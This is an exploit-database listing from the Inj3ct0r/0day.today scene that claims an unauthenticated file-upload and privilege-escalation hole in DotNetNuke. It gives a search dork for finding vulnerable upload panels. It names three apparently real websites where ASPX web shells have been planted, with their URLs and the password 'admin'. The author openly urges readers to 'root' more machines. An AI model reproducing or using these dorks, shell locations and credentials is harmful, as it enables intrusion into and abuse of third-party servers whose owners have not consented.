Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSeeMe1337DAY-ID-16462
HistoryJul 04, 2011 - 12:00 a.m.

DotNetNuke Multiple 0day Vulnerabilities

2011-07-0400:00:00
SeeMe
0day.today
37
JSON

Exploit for php platform in category web applications

==========================================
              DotNetNuke Multiple 0day Vulnerabilities
==========================================


             The largest Exploit Database in the world !
 
# Greetz to Inj3ct0r Cr3w 1337day.com
# Greetz to R0073r "Sid3^effects - Were ya @ Bro" indoushka XroGuE gunslinger_ KedAns-Dz L0rd CrusAd3r "The Exploited - I miss you buddy!"
#
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : Inj3ct0r.com                                  0
#1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
#0                                                                      0
#1                    ####################################              1
#0                    I'm SeeMe  member from Inj3ct0r Team              1
#1                    ####################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

DotNetNuke 5.x other versions may be effected as well,

[+] Application: DotNetNuke
[+] Affected Version: version prior to 5.x
[+] VendorÒ€ℒs URL: http://www.dotnetnuke.com/
[+] Bug Type: Privilege escalation, Unauthorized access, Remote
[+] Risk Level: High



[+] No-exploit is required to make it easier than what it is..
[+] DotNetNuke Remote File Upload Vulnerability
[+] Add/User Account Security Failer Vulnerability
[+] Unauthorized Full access to the Server! :)
[+] Unauthorized Full access to the Files and Database!
[+] It Could Be Failure to revalidate file and folder permissions correctly for uploads.

[-*-] Quick Note:

 [-] Vulnerability Details: DO NOT be a zone h lamer! just try to be more effective speard your shit
     And hunte more idiots and root their machines! then hit them in the middle of no where by Saying
               "Ph33r"

Access the upload panel Just dork:"inurl:ajaxfbs/browser.html"

Demo:

[1] http://www.iebsoftware.com/tramways/DesktopModules/FeedbackDesigner/ajaxfbs/browser.html
    Aspx Shell with New user Privilege
    http://www.iebsoftware.com/aspx.aspx
    Password: admin

[2] http://churchofthegoodshepherdwantage.org/DesktopModules/FlashSlide/ajaxfbs/browser.html
    Aspx Shell with New user Privilege
    http://churchofthegoodshepherdwantage.org/aspx.aspx
    Password: admin

[3] http://members2.allegranetwork.com/DeskTopModules/Complete%20Feedback%20Designer/ajaxfbs/browser.html
    Aspx Shell with New user Privilege
    http://members2.allegranetwork.com/aspx.aspx
    Password: admin




[*_*] The thanx belongs to the masters! Islamic Ghosts Team :)



#  0day.today [2018-04-11]  #
JSON